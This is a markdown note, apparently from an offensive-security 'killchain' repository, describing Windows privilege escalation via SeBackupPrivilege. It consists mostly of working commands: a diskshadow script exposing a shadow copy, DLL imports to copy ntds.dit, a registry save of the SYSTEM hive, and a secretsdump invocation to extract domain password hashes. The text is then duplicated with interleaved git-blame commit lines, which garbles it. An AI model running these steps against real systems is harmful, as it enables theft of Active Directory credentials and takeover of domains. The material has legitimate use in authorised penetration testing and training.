killchain-compendium/post exploitation/docs/windows/sebackupprivilege.md

# SEBackupPrivilege Escalation

* Check user privileges to escalate

## Usage
* Check `whoami /all`
* `SeBackupPrivilege` must be present
* [Payloads all the things](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#using-diskshadow-a-windows-signed-binary)
* Upload `diskshadow.txt` to the target with the following content, there has to be a space at the end of each line!!!!
```sh
set metadata C:\tmp\tmp.cabs 
set context persistent nowriters 
add volume c: alias someAlias 
create 
expose %someAlias% h: 
```
* Change dir to `C:\Windows\System32` and `diskshadow.exe /s C:\tmp\diskshadow.txt`
* Upload these [dlls](https://github.com/giuliano108/SeBackupPrivilege) to the target
```sh
import-module .\SeBackupPrivilegeUtils.dll
import-module .\SeBackupPrivilegeCmdLets.dll
copy-filesebackupprivilege h:\windows\ntds\ntds.dit C:\tmp\ntds.dit -overwrite
reg save HKLM\SYSTEM C:\tmp\system
```
* Downloads the files `ntds.dit` and `system`
* Extract the hashes via
```sh
secretsdump.py -system system -ntds ntds.dit LOCAL > out.txt
```
added rsync enum alternative path 2022-01-09 22:52:39 +01:00			`# SEBackupPrivilege Escalation`

			`* Check user privileges to escalate`

			`## Usage`
			* Check `whoami /all`
			* `SeBackupPrivilege` must be present
			`* [Payloads all the things](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#using-diskshadow-a-windows-signed-binary)`
bump 2022-03-10 01:31:54 +01:00			* Upload `diskshadow.txt` to the target with the following content, there has to be a space at the end of each line!!!!
added rsync enum alternative path 2022-01-09 22:52:39 +01:00			```sh
			`set metadata C:\tmp\tmp.cabs`
			`set context persistent nowriters`
			`add volume c: alias someAlias`
			`create`
bump 2022-03-10 01:31:54 +01:00			`expose %someAlias% h:`
added rsync enum alternative path 2022-01-09 22:52:39 +01:00			```
bump 2022-03-10 01:31:54 +01:00			* Change dir to `C:\Windows\System32` and `diskshadow.exe /s C:\tmp\diskshadow.txt`
added rsync enum alternative path 2022-01-09 22:52:39 +01:00			`* Upload these [dlls](https://github.com/giuliano108/SeBackupPrivilege) to the target`
			```sh
			`import-module .\SeBackupPrivilegeUtils.dll`
			`import-module .\SeBackupPrivilegeCmdLets.dll`
			`copy-filesebackupprivilege h:\windows\ntds\ntds.dit C:\tmp\ntds.dit -overwrite`
bump 2022-03-10 01:31:54 +01:00			`reg save HKLM\SYSTEM C:\tmp\system`
added rsync enum alternative path 2022-01-09 22:52:39 +01:00			```
			* Downloads the files `ntds.dit` and `system`
			`* Extract the hashes via`
			```sh
			`secretsdump.py -system system -ntds ntds.dit LOCAL > out.txt`
			```